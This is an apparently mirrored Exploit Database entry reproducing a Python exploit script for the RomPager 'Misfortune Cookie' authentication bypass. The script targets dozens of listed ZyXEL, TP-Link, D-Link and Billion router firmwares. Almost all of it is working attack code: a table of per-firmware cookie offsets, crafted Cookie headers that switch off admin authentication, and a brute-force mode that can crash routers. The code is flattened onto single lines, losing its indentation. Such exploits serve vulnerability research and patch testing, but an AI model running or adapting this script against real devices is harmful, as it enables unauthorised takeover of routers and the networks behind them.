RomPager 4.34 (Multiple Router Vendors) – ‘Misfortune Cookie’ Authentication Bypass

• Exploit Database
• 110 阅读

• 作者： Milad Doorbash
  日期： 2016-04-27
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/39739/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249

  # Title: Misfortune Cookie Exploit (RomPager <= 4.34) router authentication remover # Date: 17/4/2016 # CVE: CVE-2015-9222 (http://mis.fortunecook.ie) # Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,... # Vulnerable models: http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf # Versions affected: RomPager <= 4.34 (specifically 4.07) # Tested on : firmwares which are set as tested in the targets list # Category: Remote Exploit # Usage: ./exploit.py url # Example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040   # Author: Milad Doorbash # Email: milad.doorbash@gmail.com # Social: @doorbash # Blog: http://doorbash.ir   # Many Thanks to : # Cawan Chui (http://embedsec.systems/embedded-device-security/2015/02/16/Misfortune-Cookie-CVE-2014-9222-Demystified.html) # Piotr Bania (http://piotrbania.com/all/articles/tplink_patch) # Grant Willcox (https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2015/10/porting-the-misfortune-cookie-exploit-whitepaperpdf) # Chan (http://scz.617.cn/misc/201504141114.txt -- http://www.nsfocus.com.cn/upload/contents/2015/09/2015_09181715274142.pdf)   # Disclaimer : # This exploit is for testing and educational purposes only.Any other usage for this code is not allowed. # Author takes no responsibility for any actions with provided informations or codes.   # Description : # Misfortune Cookie is a critical vulnerability that allows an intruder to remotely # take over an Internet router and use it to attack home and business networks.With a few magic # cookies added to your request you bypass any authentication and browse the configuration # interface as admin, from any open port.   import requests import sys import time   MODE_TEST = 100000 MODE_BRUTE_FORCE = 100001   if len(sys.argv) == 1: print "usage: python " + sys.argv[0] + " url [enable]" print "example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040" exit()   url = str(sys.argv[1]) auth_byte = &apos;\x00&apos; s = requests.Session()   if len(sys.argv) == 3: if str(sys.argv[2]) == &apos;enable&apos;: auth_byte = &apos;\x01&apos; # enable authenticaion again else: print "usage: python " + sys.argv[0] + " url [enable]" exit()   targets = [   ["Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1",107367693,13], # 0x803D5A79 # tested ["Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d # ---------- ["Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d # ---------- ["Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6",107369545,9], # 0x803ec2ad # ---------- ["Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0",107371218,21], # 0x803c53e5 # ---------- ["Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0",107366366,25], # 0x8038a6e1 # ---------- ["Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0",107371453,9], # 0x803b3a51 # ---------- ["Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52",107367690,21], # 0x803D8A51 # tested ["Billion BiPAC 5200S 2.10.5.0 (UE0.C2C) 3.6.0.0",107368270,1], # 0x8034b109 # ---------- ["Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0",107371378,37], # 0x8040587d # ---------- ["Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22",107371218,13], # 0x803c49d5 # ---------- ["D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL",107368902,25], # 0x803fea01 # tested ["D-Link DSL-2600U Z1 DSL-2600U HWZ1",107366496,13], # 0x8040637d # ---------- ["D-Link DSL-2600U Z2 V1.08_ras",107360133,20], # 0x803389B0 # ---------- ["TP-Link TD-8616 V2 TD-8616_v2_080513",107371483,21], # 0x80397055 # ---------- ["TP-Link TD-8816 V4 TD-8816_100528_Russia",107369790,17], # 0x803ae0b1 # ---------- ["TP-Link TD-8816 V4 TD-8816_V4_100524",107369790,17], # 0x803ae0b1 # ---------- ["TP-Link TD-8816 V5 TD-8816_100528_Russia",107369790,17], # 0x803ae0b1 # ---------- ["TP-Link TD-8816 V5 TD-8816_V5_100524",107369790,17], # 0x803ae0b1 # tested ["TP-Link TD-8816 V5 TD-8816_V5_100903",107369790,17], # 0x803ae0b1 # ---------- ["TP-Link TD-8816 V6 TD-8816_V6_100907",107371426,17], # 0x803c6e09 # ---------- ["TP-Link TD-8816 V7 TD-8816_V7_111103",107371161,1], # 0x803e1bd5 # ---------- ["TP-Link TD-8816 V7 TD-8816_V7_130204",107370211,5], # 0x80400c85 # ---------- ["TP-Link TD-8817 V5 TD-8817_V5_100524",107369790,17], # 0x803ae0b1 # ---------- ["TP-Link TD-8817 V5 TD-8817_V5_100702_TR",107369790,17], # 0x803ae0b1 # ---------- ["TP-Link TD-8817 V5 TD-8817_V5_100903",107369790,17], # 0x803ae0b1 # ---------- ["TP-Link TD-8817 V6 TD-8817_V6_100907",107369788,1], # 0x803b6e09 # ---------- ["TP-Link TD-8817 V6 TD-8817_V6_101221",107369788,1], # 0x803b6e09 # ---------- ["TP-Link TD-8817 V7 TD-8817_V7_110826",107369522,25], # 0x803d1bd5 # ---------- ["TP-Link TD-8817 V7 TD-8817_V7_130217",107369316,21], # 0x80407625 # ---------- ["TP-Link TD-8817 V7 TD-8817_v7_120509",107369321,9], # 0x803fbcc5 # tested ["TP-Link TD-8817 V8 TD-8817_V8_140311",107351277,20], # 0x8024E148 # Grant Willcox ["TP-Link TD-8820 V3 TD-8820_V3_091223",107369768,17], # 0x80397E69 # Chan ["TP-Link TD-8840T V1 TD-8840T_080520",107369845,5], # 0x80387055 # ---------- ["TP-Link TD-8840T V2 TD-8840T_V2_100525",107369790,17], # 0x803ae0b1 # tested ["TP-Link TD-8840T V2 TD-8840T_V2_100702_TR",107369790,17], # 0x803ae0b1 # ---------- ["TP-Link TD-8840T V2 TD-8840T_v2_090609",107369570,1], # 0x803c65d5 # ---------- ["TP-Link TD-8840T V3 TD-8840T_V3_101208",107369766,17], #0x803c3e89 # tested ["TP-Link TD-8840T V3 TD-8840T_V3_110221",107369764,5], # 0x803d1a09 # ---------- ["TP-Link TD-8840T V3 TD-8840T_V3_120531",107369688,17], # 0x803fed35 # ---------- ["TP-Link TD-W8101G V1 TD-W8101G_090107",107367772,37], # 0x803bf701 # ---------- ["TP-Link TD-W8101G V1 TD-W8101G_090107",107367808,21], # 0x803e5b6d # ---------- ["TP-Link TD-W8101G V2 TD-W8101G_V2_100819",107367751,21], # 0x803dc701 # ---------- ["TP-Link TD-W8101G V2 TD-W8101G_V2_101015_TR",107367749,13], # 0x803e1829 # ---------- ["TP-Link TD-W8101G V2 TD-W8101G_V2_101101",107367749,13], # 0x803e1829 # ---------- ["TP-Link TD-W8101G V3 TD-W8101G_V3_110119",107367765,25], # 0x804bb941 # ---------- ["TP-Link TD-W8101G V3 TD-W8101G_V3_120213",107367052,25], # 0x804e1ff9 # ---------- ["TP-Link TD-W8101G V3 TD-W8101G_V3_120604",107365835,1], # 0x804f16a9 # ---------- ["TP-Link TD-W8151N V3 TD-W8151N_V3_120530",107353867,24], # 0x8034F3A4 # tested ["TP-Link TD-W8901G V1 TD-W8901G_080522",107367787,21], # 0x803AB30D # Piotr Bania ["TP-Link TD-W8901G V1,2 TD-W8901G_080522",107368013,5], # 0x803AB30D # ---------- ["TP-Link TD-W8901G V2 TD-W8901G_090113_Turkish",107368013,5], # 0x803AB30D # ---------- ["TP-Link TD-W8901G V3 TD-W8901G(UK)_V3_140512",107367854,9], # 0x803cf335 # tested ["TP-Link TD-W8901G V3 TD-W8901G_V3_100603",107367751,21], # 0x803DC701 # chan ["TP-Link TD-W8901G V3 TD-W8901G_V3_100702_TR",107367751,21], # 0x803DC701 # tested ["TP-Link TD-W8901G V3 TD-W8901G_V3_100901",107367749,13], # 0x803E1829 # tested ["TP-Link TD-W8901G V6 TD-W8901G_V6_110119",107367765,25], # 0x804BB941 # Chan ["TP-Link TD-W8901G V6 TD-W8901G_V6_110915",107367682,21], # 0x804D7CB9 # Chan ["TP-Link TD-W8901G V6 TD-W8901G_V6_120418",107365835,1], # 0x804F16A9 # ---------- ["TP-Link TD-W8901G V6 TD-W8901G_V6_120213",107367052,25], # 0x804E1FF9 # ---------- ["TP-Link TD-W8901GB V3 TD-W8901GB_V3_100727",107367756,13], # 0x803dfbe9 # ---------- ["TP-Link TD-W8901GB V3 TD-W8901GB_V3_100820",107369393,21], # 0x803f1719 # ---------- ["TP-Link TD-W8901N V1 TD-W8901N v1_111211",107353880,0],# 0x8034FF94 # cawan Chui ["TP-Link TD-W8951ND V1 TD-TD-W8951ND_V1_101124,100723,100728",107369839,25], # 0x803d2d61 # tested ["TP-Link TD-W8951ND V1 TD-TD-W8951ND_V1_110907",107369876,13], # 0x803d6ef9 # ---------- ["TP-Link TD-W8951ND V1 TD-W8951ND_V1_111125",107369876,13], # 0x803d6ef9 # ---------- ["TP-Link TD-W8951ND V3 TD-W8951ND_V3.0_110729_FI",107366743,21], # 0x804ef189 # ---------- ["TP-Link TD-W8951ND V3 TD-W8951ND_V3_110721",107366743,21], # 0x804ee049 # ---------- ["TP-Link TD-W8951ND V3 TD-W8951ND_V3_20110729_FI",107366743,21], # 0x804ef189 # ---------- ["TP-Link TD-W8951ND V4 TD-W8951ND_V4_120511",107364759,25],# 0x80523979 # tested ["TP-Link TD-W8951ND V4 TD-W8951ND_V4_120607",107364759,13], # 0x80524A91 # tested ["TP-Link TD-W8951ND V4 TD-W8951ND_v4_120912_FL",107364760,21], # 0x80523859 # tested ["TP-Link TD-W8961NB V1 TD-W8961NB_V1_110107",107369844,17], # 0x803de3f1 # tested ["TP-Link TD-W8961NB V1 TD-W8961NB_V1_110519",107369844,17], # 0x803de3f1 # ---------- ["TP-Link TD-W8961NB V2 TD-W8961NB_V2_120319",107367629,21], # 0x80531859 # ---------- ["TP-Link TD-W8961NB V2 TD-W8961NB_V2_120823",107366421,13], # 0x80542e59 # ---------- ["TP-Link TD-W8961ND V1 TD-W8961ND_V1_100722,101122",107369839,25], # 0x803D2D61 # tested ["TP-Link TD-W8961ND V1 TD-W8961ND_V1_101022_TR",107369839,25], # 0x803D2D61 # ---------- ["TP-Link TD-W8961ND V1 TD-W8961ND_V1_111125",107369876,13], # 0x803D6EF9 # ---------- ["TP-Link TD-W8961ND V2 TD-W8961ND_V2_120427",107364732,25], # 0x8052e0e9 # ---------- ["TP-Link TD-W8961ND V2 TD-W8961ND_V2_120710_UK",107364771,37], # 0x80523AA9 # ---------- ["TP-Link TD-W8961ND V2 TD-W8961ND_V2_120723_FI",107364762,29], # 0x8052B6B1 # ---------- ["TP-Link TD-W8961ND V3 TD-W8961ND_V3_120524,120808",107353880,0], # 0x803605B4 # ---------- ["TP-Link TD-W8961ND V3 TD-W8961ND_V3_120830",107353414,36], # 0x803605B4 # ---------- ["ZyXEL P-660R-T3 V3 3.40(BOQ.0)C0",107369567,21], # 0x803db071 # tested ["ZyXEL P-660RU-T3 V3 3.40(BJR.0)C0",107369567,21], # 0x803db071 # ----------   # *---------- means data for this firmware is obtained from other tested firmwares. # if you tested on your devices report to me so i can change them to tested state. # don&apos;t forget to mention your device model and full firmware version in your reports. # I could not gather information for every vulnerable firmwares since some vendors has removed # vulnerable/old ones from their websites or add some unknown-yet security mechanisms to the them. # if you want to add missing firmwares data to list you can do it by reading blog posts # mentioned in "Many thanks to" part at the beginning.Btw please don&apos;t hesitate to contact me # for any question or further information.   ]   def request(num,n,data): try: print "\nConnecting to: " + url + "\n" s.headers.update({"Cookie":"C" + str(num) + "=" + "B"* n + data + ";"}) r = s.get(url) print str(r.status_code) + "\n" for i in r.headers: print i + ": " + r.headers[i] return [r.status_code,r.text] except Exception, e: return 1000     def printMenu(): print """ ____ ____ |\/(_)___ / _| ____ __| |_ _ _ _ __ ___ | |\/| | / __| |_ / _ \| &apos;__| __| | | | &apos;_ \ / _ \ | || | \__ \_| (_) | || |_| |_| | | | |__/ |_||_|_|___/_|\___/|_| \__|\__,_|_| |_|\___|   ____________ _ _ / ___|___ ___ | | _(_) ___| ____|____ __ | | ___ (_) |_ | | / _ \ / _ \| |/ / |/ _ \ |_| \ \/ / &apos;_ \| |/ _ \| | __| | |__| (_) | (_) | <| |__/ | |___ ><| |_) | | (_) | | |_ \____\___/ \___/|_|\_\_|\___| |_____/_/\_\ .__/|_|\___/|_|\__| |_|   ---------------------------------------------------------------------------- """ for k,i in enumerate(targets): print str(k+1) + "- " + i[0]   print """ 0- Not sure just try them all! (may cause reboot) T- Test misfortune cookie vulnerablity against target B- BruteForce to find auth-remover cookie (may cause reboot) """ c = 0 while True: selection = raw_input("select a target: ") if selection == "T": return MODE_TEST elif selection == "B": return MODE_BRUTE_FORCE c = int(selection) if c <= len(targets): break else: print "bad input try again" return c - 1   def bruteforce(): for i in range(107364000,107380000): for j in range(0,40): print "testing " + str(i) + " , " + str(j) result = request(i,j,"\x00")[0] if result <= 302: print "YEAHHH!!!!" print str(i) + " , " + str(j) + " is the answer!" return elif result == 1000: time.sleep(60)   def exploit(): c = printMenu() if c < 0: for k,i in enumerate(targets): print "testing #" + str(k+1) + " ..." result = request(i[1],i[2],auth_byte)[0] if result == 1000: print "\n[!] Error. maybe router crashed by sending wrong cookie or it&apos;s your connection problem.waiting 60 seconds for router to reboot" time.sleep(60) elif result <= 302: print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not." break # some routers always return 200 (for custom login page). so maybe we should comment this line else: print "\n[!] Failed." else: if c == MODE_TEST: if "HelloWorld" in request(107373883,0,"/HelloWorld")[1]: print "\n[!] Target is vulnerable" else: print "\n[!] Target is not vulnerable" elif c == MODE_BRUTE_FORCE: bruteforce() elif request(targets[c][1],targets[c][2],auth_byte)[0] > 302: print "\n[!] Failed." else: print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."   exploit()